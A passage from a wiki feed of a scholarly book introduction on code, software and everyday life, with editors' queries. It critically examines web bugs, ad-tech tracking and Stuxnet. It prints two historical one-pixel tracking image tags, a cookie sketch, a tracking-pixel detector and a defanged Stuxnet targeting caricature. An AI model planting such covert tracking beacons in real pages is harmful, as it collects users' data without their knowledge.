[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] That is, computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to the ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary positive moment of intervention in the formation and composition of future, alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4708</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4708"/>
		<updated>2012-04-18T14:35:03Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project, a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al.'' have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would itself be remarkable, had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, one I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how more softwarized simulacra lie just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages we browse. Often held within a tiny one-pixel frame or image, far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally specified as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
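&lt;br /&gt;
To make the mechanism concrete, here is a minimal sketch using Python's standard http.cookies module (the identifier, value and domain are invented for illustration): a server-side script emits a Set-Cookie header, and on a later request reads back whatever state the browser returns: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
from http.cookies import SimpleCookie

# Server side: set a small piece of 'state' on the client.
cookie = SimpleCookie()
cookie['visitor_id'] = 'ab12cd34'            # a hypothetical tracking identifier
cookie['visitor_id']['max-age'] = 31536000   # persist for one year
cookie['visitor_id']['domain'] = '.example.com'
print(cookie.output())    # the Set-Cookie header sent to the browser

# Server side, on a later request: read back the state the browser returned.
returned = SimpleCookie('visitor_id=ab12cd34')
print(returned['visitor_id'].value)
&amp;lt;/pre&amp;gt; &lt;br /&gt;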
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user, code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any)&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on this web bug, such as the fact that it has been found on over 100,000 websites across the Internet and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
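&lt;br /&gt;
In the same spirit as the tools discussed above, the classic one-pixel signature shown in the EFF examples can be detected with a few lines of Python (a toy sketch using the standard html.parser module; real trackers are far more varied than this simple pattern): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
from html.parser import HTMLParser

class WebBugDetector(HTMLParser):
    # Flags img elements bearing the classic 1x1 'tracking pixel' signature.
    def __init__(self):
        super().__init__()
        self.suspects = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'img' and a.get('width') == '1' and a.get('height') == '1':
            self.suspects.append(a.get('src', 'unknown source'))

# A fabricated page standing in for fetched HTML.
page = '&amp;amp;lt;html&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;http://tracker.example/p.gif&amp;quot; width=&amp;quot;1&amp;quot; height=&amp;quot;1&amp;quot;&amp;amp;gt;&amp;amp;lt;/html&amp;amp;gt;'
detector = WebBugDetector()
detector.feed(page)
print(detector.suspects)   # ['http://tracker.example/p.gif']
&amp;lt;/pre&amp;gt; &lt;br /&gt;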
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative frequencies of encounter, Google is clearly the biggest player by a long distance in the area of user-statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) generates $189, a unique visitor to [http://www.businessinsider.com/blackboard/google Google] (search) generates $24, and although Facebook (social networking) generates only $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed, in testimony to a U.S. House of Representatives subcommittee, that it was ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header, and there is currently no legal requirement in the US, or elsewhere, that they do so (W3C, 2012). One can also see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
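&lt;br /&gt;
Mechanically, the flag itself is trivial: it is a single HTTP request header, as this Python sketch shows (the URL is a placeholder); the entire regulatory debate is over whether anyone at the server end is obliged to honour it: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import urllib.request

# Send an ordinary request with the 'do not track' preference expressed.
# The URL is a placeholder; 'Tk' is the W3C tracking-status response header.
request = urllib.request.Request(
    'http://www.example.com/',
    headers={'DNT': '1'},   # DNT: 1 signals the user's opt-out preference
)
with urllib.request.urlopen(request) as response:
    print(response.status, response.headers.get('Tk', 'no tracking-status header'))
&amp;lt;/pre&amp;gt; &lt;br /&gt;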
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday lives and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growing use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and of the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the user the impression that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the uranium-enrichment facility at Natanz in Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and then activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
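&lt;br /&gt;
The hunting logic O Murchu describes can be caricatured in a few lines of Python (a deliberately defanged sketch: the hosts and their attributes are invented, nothing is probed or modified, and only the Siemens S7-300 and 164-cascade details are drawn from the reports cited here): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A defanged caricature of 'strike conditions': invented hosts, no real probing.
hosts = [
    {'name': 'office-pc', 'plc': None},
    {'name': 'engineering-ws', 'plc': 'Siemens S7-300', 'cascades': 164},
]

def strike_conditions_met(host):
    # Only 'detonate' on the precise configuration the worm was built for.
    return host.get('plc') == 'Siemens S7-300' and host.get('cascades') == 164

for host in hosts:
    if strike_conditions_met(host):
        print(host['name'] + ': strike conditions met, activate payload')
    else:
        print(host['name'] + ': conditions not met, keep propagating quietly')
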